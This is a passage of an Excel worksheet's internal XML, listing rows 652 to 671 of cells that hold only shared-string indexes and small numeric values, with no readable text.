      <c r="S652" s="12" t="s">
        <v>4975</v>
      </c>
      <c r="T652" s="12" t="s">
        <v>3562</v>
      </c>
      <c r="U652" s="12" t="s">
        <v>4976</v>
      </c>
      <c r="V652" s="12" t="s">
        <v>1367</v>
      </c>
      <c r="W652" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X652" s="12">
        <v>7</v>
      </c>
      <c r="Y652" s="12" t="s">
        <v>4977</v>
      </c>
    </row>
    <row r="653" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A653" s="12">
        <v>2977</v>
      </c>
      <c r="B653" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D653" s="12" t="s">
        <v>28901</v>
      </c>
      <c r="E653" s="12" t="s">
        <v>31432</v>
      </c>
      <c r="F653" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G653" s="12" t="s">
        <v>4978</v>
      </c>
      <c r="H653" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I653" s="12" t="s">
        <v>925</v>
      </c>
      <c r="J653" s="12" t="s">
        <v>926</v>
      </c>
      <c r="K653" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L653" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M653" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N653" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O653" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P653" s="12" t="s">
        <v>4324</v>
      </c>
      <c r="Q653" s="12">
        <v>2.6</v>
      </c>
      <c r="R653" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S653" s="12" t="s">
        <v>4979</v>
      </c>
      <c r="T653" s="12" t="s">
        <v>4980</v>
      </c>
      <c r="U653" s="12" t="s">
        <v>4981</v>
      </c>
      <c r="V653" s="12" t="s">
        <v>299</v>
      </c>
      <c r="W653" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X653" s="12">
        <v>7</v>
      </c>
      <c r="Y653" s="12" t="s">
        <v>4982</v>
      </c>
    </row>
    <row r="654" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A654" s="12">
        <v>2980</v>
      </c>
      <c r="B654" s="12" t="s">
        <v>28902</v>
      </c>
      <c r="C654" s="12" t="s">
        <v>28260</v>
      </c>
      <c r="D654" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E654" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F654" s="12" t="s">
        <v>28897</v>
      </c>
      <c r="G654" s="12" t="s">
        <v>4983</v>
      </c>
      <c r="H654" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I654" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J654" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K654" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L654" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M654" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N654" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O654" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P654" s="12" t="s">
        <v>4324</v>
      </c>
      <c r="Q654" s="12">
        <v>2.6</v>
      </c>
      <c r="R654" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S654" s="12" t="s">
        <v>4984</v>
      </c>
      <c r="T654" s="12" t="s">
        <v>3812</v>
      </c>
      <c r="U654" s="12" t="s">
        <v>4985</v>
      </c>
      <c r="V654" s="12" t="s">
        <v>4689</v>
      </c>
      <c r="W654" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X654" s="12">
        <v>3</v>
      </c>
      <c r="Y654" s="12" t="s">
        <v>4986</v>
      </c>
    </row>
    <row r="655" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A655" s="12">
        <v>2987</v>
      </c>
      <c r="B655" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D655" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F655" s="12" t="s">
        <v>29763</v>
      </c>
      <c r="G655" s="12" t="s">
        <v>4989</v>
      </c>
      <c r="H655" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I655" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J655" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K655" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L655" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M655" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N655" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O655" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P655" s="12" t="s">
        <v>4324</v>
      </c>
      <c r="Q655" s="12">
        <v>2.6</v>
      </c>
      <c r="R655" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S655" s="12" t="s">
        <v>4990</v>
      </c>
      <c r="T655" s="12" t="s">
        <v>4991</v>
      </c>
      <c r="U655" s="12" t="s">
        <v>4992</v>
      </c>
      <c r="V655" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W655" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X655" s="12">
        <v>2</v>
      </c>
      <c r="Y655" s="12" t="s">
        <v>4993</v>
      </c>
    </row>
    <row r="656" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A656" s="12">
        <v>2990</v>
      </c>
      <c r="B656" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D656" s="12" t="s">
        <v>28901</v>
      </c>
      <c r="E656" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F656" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G656" s="12" t="s">
        <v>4994</v>
      </c>
      <c r="H656" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I656" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J656" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K656" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L656" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M656" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N656" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O656" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P656" s="12" t="s">
        <v>4324</v>
      </c>
      <c r="Q656" s="12">
        <v>2.6</v>
      </c>
      <c r="R656" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S656" s="12" t="s">
        <v>4995</v>
      </c>
      <c r="T656" s="12" t="s">
        <v>2391</v>
      </c>
      <c r="U656" s="12" t="s">
        <v>4996</v>
      </c>
      <c r="V656" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W656" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X656" s="12">
        <v>1</v>
      </c>
      <c r="Y656" s="12" t="s">
        <v>4997</v>
      </c>
    </row>
    <row r="657" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A657" s="12">
        <v>2994</v>
      </c>
      <c r="B657" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C657" s="12" t="s">
        <v>28357</v>
      </c>
      <c r="D657" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F657" s="12" t="s">
        <v>29758</v>
      </c>
      <c r="G657" s="12" t="s">
        <v>4998</v>
      </c>
      <c r="H657" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I657" s="12" t="s">
        <v>525</v>
      </c>
      <c r="J657" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K657" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L657" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M657" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N657" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O657" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P657" s="12" t="s">
        <v>4999</v>
      </c>
      <c r="Q657" s="12">
        <v>2.6</v>
      </c>
      <c r="R657" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S657" s="12" t="s">
        <v>5000</v>
      </c>
      <c r="T657" s="12" t="s">
        <v>5001</v>
      </c>
      <c r="U657" s="12" t="s">
        <v>917</v>
      </c>
      <c r="V657" s="12" t="s">
        <v>39</v>
      </c>
      <c r="W657" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X657" s="12">
        <v>4</v>
      </c>
      <c r="Y657" s="12" t="s">
        <v>5002</v>
      </c>
    </row>
    <row r="658" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A658" s="12">
        <v>3003</v>
      </c>
      <c r="B658" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C658" s="12" t="s">
        <v>28361</v>
      </c>
      <c r="D658" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F658" s="12" t="s">
        <v>29763</v>
      </c>
      <c r="G658" s="12" t="s">
        <v>5003</v>
      </c>
      <c r="H658" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I658" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J658" s="12" t="s">
        <v>139</v>
      </c>
      <c r="K658" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L658" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M658" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N658" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O658" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P658" s="12" t="s">
        <v>4324</v>
      </c>
      <c r="Q658" s="12">
        <v>2.6</v>
      </c>
      <c r="R658" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S658" s="12" t="s">
        <v>5004</v>
      </c>
      <c r="T658" s="12" t="s">
        <v>3544</v>
      </c>
      <c r="U658" s="12" t="s">
        <v>5005</v>
      </c>
      <c r="V658" s="12" t="s">
        <v>4362</v>
      </c>
      <c r="W658" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X658" s="12">
        <v>3</v>
      </c>
      <c r="Y658" s="12" t="s">
        <v>5006</v>
      </c>
    </row>
    <row r="659" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A659" s="12">
        <v>3012</v>
      </c>
      <c r="B659" s="12" t="s">
        <v>28903</v>
      </c>
      <c r="D659" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E659" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F659" s="12" t="s">
        <v>28886</v>
      </c>
      <c r="G659" s="12" t="s">
        <v>5009</v>
      </c>
      <c r="H659" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I659" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J659" s="12" t="s">
        <v>3174</v>
      </c>
      <c r="K659" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L659" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M659" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N659" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O659" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P659" s="12" t="s">
        <v>4324</v>
      </c>
      <c r="Q659" s="12">
        <v>2.6</v>
      </c>
      <c r="R659" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S659" s="12" t="s">
        <v>5010</v>
      </c>
      <c r="T659" s="12" t="s">
        <v>5011</v>
      </c>
      <c r="U659" s="12" t="s">
        <v>5012</v>
      </c>
      <c r="V659" s="12" t="s">
        <v>1367</v>
      </c>
      <c r="W659" s="12">
        <v>3142</v>
      </c>
      <c r="X659" s="12">
        <v>7</v>
      </c>
      <c r="Y659" s="12" t="s">
        <v>5013</v>
      </c>
    </row>
    <row r="660" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A660" s="12">
        <v>3015</v>
      </c>
      <c r="B660" s="12" t="s">
        <v>28893</v>
      </c>
      <c r="D660" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F660" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G660" s="12" t="s">
        <v>5020</v>
      </c>
      <c r="H660" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I660" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J660" s="12" t="s">
        <v>23</v>
      </c>
      <c r="K660" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L660" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M660" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N660" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O660" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P660" s="12" t="s">
        <v>5021</v>
      </c>
      <c r="Q660" s="12">
        <v>2.6</v>
      </c>
      <c r="R660" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S660" s="12" t="s">
        <v>5022</v>
      </c>
      <c r="T660" s="12" t="s">
        <v>5023</v>
      </c>
      <c r="U660" s="12" t="s">
        <v>5024</v>
      </c>
      <c r="V660" s="12" t="s">
        <v>3738</v>
      </c>
      <c r="W660" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X660" s="12">
        <v>0</v>
      </c>
      <c r="Y660" s="12" t="s">
        <v>5025</v>
      </c>
    </row>
    <row r="661" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A661" s="12">
        <v>3020</v>
      </c>
      <c r="B661" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C661" s="12" t="s">
        <v>28882</v>
      </c>
      <c r="D661" s="12" t="s">
        <v>28904</v>
      </c>
      <c r="F661" s="12" t="s">
        <v>28905</v>
      </c>
      <c r="G661" s="12" t="s">
        <v>5026</v>
      </c>
      <c r="H661" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I661" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J661" s="12" t="s">
        <v>1203</v>
      </c>
      <c r="K661" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L661" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M661" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N661" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O661" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P661" s="12" t="s">
        <v>5027</v>
      </c>
      <c r="Q661" s="12">
        <v>2.5</v>
      </c>
      <c r="R661" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S661" s="12" t="s">
        <v>5028</v>
      </c>
      <c r="T661" s="12" t="s">
        <v>2391</v>
      </c>
      <c r="U661" s="12" t="s">
        <v>5029</v>
      </c>
      <c r="V661" s="12" t="s">
        <v>2864</v>
      </c>
      <c r="W661" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X661" s="12">
        <v>2</v>
      </c>
      <c r="Y661" s="12" t="s">
        <v>5030</v>
      </c>
    </row>
    <row r="662" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A662" s="12">
        <v>3023</v>
      </c>
      <c r="B662" s="12" t="s">
        <v>28893</v>
      </c>
      <c r="D662" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F662" s="12" t="s">
        <v>28906</v>
      </c>
      <c r="G662" s="12" t="s">
        <v>5031</v>
      </c>
      <c r="H662" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I662" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J662" s="12" t="s">
        <v>14</v>
      </c>
      <c r="K662" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L662" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M662" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N662" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O662" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P662" s="12" t="s">
        <v>5032</v>
      </c>
      <c r="Q662" s="12">
        <v>2.4</v>
      </c>
      <c r="R662" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S662" s="12" t="s">
        <v>5033</v>
      </c>
      <c r="T662" s="12" t="s">
        <v>5034</v>
      </c>
      <c r="U662" s="12" t="s">
        <v>5035</v>
      </c>
      <c r="V662" s="12" t="s">
        <v>1472</v>
      </c>
      <c r="W662" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X662" s="12">
        <v>2</v>
      </c>
      <c r="Y662" s="12" t="s">
        <v>5036</v>
      </c>
    </row>
    <row r="663" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A663" s="12">
        <v>3024</v>
      </c>
      <c r="B663" s="12" t="s">
        <v>28907</v>
      </c>
      <c r="D663" s="12" t="s">
        <v>28908</v>
      </c>
      <c r="E663" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F663" s="12" t="s">
        <v>28899</v>
      </c>
      <c r="G663" s="12" t="s">
        <v>5037</v>
      </c>
      <c r="H663" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I663" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J663" s="12" t="s">
        <v>347</v>
      </c>
      <c r="K663" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L663" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M663" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N663" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O663" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P663" s="12" t="s">
        <v>4324</v>
      </c>
      <c r="Q663" s="12">
        <v>2.6</v>
      </c>
      <c r="R663" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S663" s="12" t="s">
        <v>5038</v>
      </c>
      <c r="T663" s="12" t="s">
        <v>5039</v>
      </c>
      <c r="U663" s="12" t="s">
        <v>5040</v>
      </c>
      <c r="V663" s="12" t="s">
        <v>5041</v>
      </c>
      <c r="W663" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X663" s="12">
        <v>8</v>
      </c>
      <c r="Y663" s="12" t="s">
        <v>5042</v>
      </c>
    </row>
    <row r="664" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A664" s="12">
        <v>3037</v>
      </c>
      <c r="B664" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D664" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E664" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F664" s="12" t="s">
        <v>28909</v>
      </c>
      <c r="G664" s="12" t="s">
        <v>5060</v>
      </c>
      <c r="H664" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I664" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J664" s="12" t="s">
        <v>1203</v>
      </c>
      <c r="K664" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L664" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M664" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N664" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O664" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P664" s="12">
        <v>2.6</v>
      </c>
      <c r="Q664" s="12">
        <v>2.6</v>
      </c>
      <c r="R664" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S664" s="12" t="s">
        <v>5061</v>
      </c>
      <c r="T664" s="12" t="s">
        <v>2391</v>
      </c>
      <c r="U664" s="12" t="s">
        <v>5062</v>
      </c>
      <c r="V664" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W664" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X664" s="12">
        <v>1</v>
      </c>
      <c r="Y664" s="12" t="s">
        <v>5063</v>
      </c>
    </row>
    <row r="665" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A665" s="12">
        <v>3043</v>
      </c>
      <c r="B665" s="12" t="s">
        <v>28910</v>
      </c>
      <c r="D665" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F665" s="12" t="s">
        <v>28911</v>
      </c>
      <c r="G665" s="12" t="s">
        <v>5064</v>
      </c>
      <c r="H665" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I665" s="12" t="s">
        <v>925</v>
      </c>
      <c r="J665" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K665" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L665" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M665" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N665" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O665" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P665" s="12" t="s">
        <v>5065</v>
      </c>
      <c r="Q665" s="12">
        <v>2.4</v>
      </c>
      <c r="R665" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S665" s="12" t="s">
        <v>5066</v>
      </c>
      <c r="T665" s="12" t="s">
        <v>5067</v>
      </c>
      <c r="U665" s="12" t="s">
        <v>5068</v>
      </c>
      <c r="V665" s="12" t="s">
        <v>5069</v>
      </c>
      <c r="W665" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X665" s="12">
        <v>5</v>
      </c>
      <c r="Y665" s="12" t="s">
        <v>5070</v>
      </c>
    </row>
    <row r="666" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A666" s="12">
        <v>3049</v>
      </c>
      <c r="B666" s="12" t="s">
        <v>28912</v>
      </c>
      <c r="C666" s="12" t="s">
        <v>28913</v>
      </c>
      <c r="D666" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E666" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F666" s="12" t="s">
        <v>28914</v>
      </c>
      <c r="G666" s="12" t="s">
        <v>5071</v>
      </c>
      <c r="H666" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I666" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J666" s="12" t="s">
        <v>2609</v>
      </c>
      <c r="K666" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L666" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M666" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N666" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O666" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P666" s="12" t="s">
        <v>5072</v>
      </c>
      <c r="Q666" s="12">
        <v>2.6</v>
      </c>
      <c r="R666" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S666" s="12" t="s">
        <v>5073</v>
      </c>
      <c r="T666" s="12" t="s">
        <v>5074</v>
      </c>
      <c r="U666" s="12" t="s">
        <v>5062</v>
      </c>
      <c r="V666" s="12" t="s">
        <v>2391</v>
      </c>
      <c r="W666" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X666" s="12">
        <v>12</v>
      </c>
      <c r="Y666" s="12" t="s">
        <v>5075</v>
      </c>
    </row>
    <row r="667" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A667" s="12">
        <v>3056</v>
      </c>
      <c r="B667" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D667" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E667" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F667" s="12" t="s">
        <v>28916</v>
      </c>
      <c r="G667" s="12" t="s">
        <v>5079</v>
      </c>
      <c r="H667" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I667" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J667" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K667" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L667" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M667" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N667" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O667" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P667" s="12" t="s">
        <v>5080</v>
      </c>
      <c r="Q667" s="12">
        <v>2.6</v>
      </c>
      <c r="R667" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S667" s="12" t="s">
        <v>5081</v>
      </c>
      <c r="T667" s="12" t="s">
        <v>4008</v>
      </c>
      <c r="U667" s="12" t="s">
        <v>5082</v>
      </c>
      <c r="V667" s="12" t="s">
        <v>48</v>
      </c>
      <c r="W667" s="12" t="s">
        <v>5083</v>
      </c>
      <c r="X667" s="12">
        <v>20</v>
      </c>
      <c r="Y667" s="12" t="s">
        <v>5084</v>
      </c>
    </row>
    <row r="668" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A668" s="12">
        <v>3092</v>
      </c>
      <c r="B668" s="12" t="s">
        <v>28917</v>
      </c>
      <c r="D668" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F668" s="12" t="s">
        <v>28918</v>
      </c>
      <c r="G668" s="12" t="s">
        <v>5096</v>
      </c>
      <c r="H668" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I668" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J668" s="12" t="s">
        <v>4248</v>
      </c>
      <c r="K668" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L668" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M668" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N668" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O668" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P668" s="12" t="s">
        <v>5085</v>
      </c>
      <c r="Q668" s="12">
        <v>2.6</v>
      </c>
      <c r="R668" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S668" s="12" t="s">
        <v>5097</v>
      </c>
      <c r="T668" s="12" t="s">
        <v>2213</v>
      </c>
      <c r="U668" s="12" t="s">
        <v>5098</v>
      </c>
      <c r="V668" s="12" t="s">
        <v>5099</v>
      </c>
      <c r="W668" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X668" s="12">
        <v>18</v>
      </c>
      <c r="Y668" s="12" t="s">
        <v>5100</v>
      </c>
    </row>
    <row r="669" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A669" s="12">
        <v>3107</v>
      </c>
      <c r="B669" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D669" s="12" t="s">
        <v>28919</v>
      </c>
      <c r="F669" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G669" s="12" t="s">
        <v>5101</v>
      </c>
      <c r="H669" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I669" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J669" s="12" t="s">
        <v>363</v>
      </c>
      <c r="K669" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L669" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M669" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N669" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O669" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P669" s="12" t="s">
        <v>5102</v>
      </c>
      <c r="Q669" s="12">
        <v>2.6</v>
      </c>
      <c r="R669" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S669" s="12" t="s">
        <v>5103</v>
      </c>
      <c r="T669" s="12" t="s">
        <v>5104</v>
      </c>
      <c r="U669" s="12" t="s">
        <v>5105</v>
      </c>
      <c r="V669" s="12" t="s">
        <v>411</v>
      </c>
      <c r="W669" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X669" s="12">
        <v>2</v>
      </c>
      <c r="Y669" s="12" t="s">
        <v>5106</v>
      </c>
    </row>
    <row r="670" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A670" s="12">
        <v>3108</v>
      </c>
      <c r="B670" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D670" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E670" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F670" s="12" t="s">
        <v>28920</v>
      </c>
      <c r="G670" s="12" t="s">
        <v>5107</v>
      </c>
      <c r="H670" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I670" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J670" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K670" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L670" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M670" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N670" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O670" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P670" s="12" t="s">
        <v>4324</v>
      </c>
      <c r="Q670" s="12">
        <v>2.6</v>
      </c>
      <c r="R670" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S670" s="12" t="s">
        <v>5108</v>
      </c>
      <c r="T670" s="12" t="s">
        <v>5109</v>
      </c>
      <c r="U670" s="12" t="s">
        <v>5110</v>
      </c>
      <c r="V670" s="12" t="s">
        <v>5111</v>
      </c>
      <c r="W670" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X670" s="12">
        <v>8</v>
      </c>
      <c r="Y670" s="12" t="s">
        <v>5112</v>
      </c>
    </row>
    <row r="671" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A671" s="12">
        <v>3113</v>
      </c>
      <c r="B671" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D671" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F671" s="12" t="s">
        <v>28919</v>
      </c>
      <c r="G671" s="12" t="s">
        <v>5113</v>
      </c>
      <c r="H671" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I671" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J671" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K671" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L671" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M671" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N671" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O671" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P671" s="12" t="s">
        <v>3788</v>
      </c>
      <c r="Q671" s="12">
        <v>2.6</v>
      </c>
      <c r="R671" s="12" t="s">
        <v>17</v>
      </c>
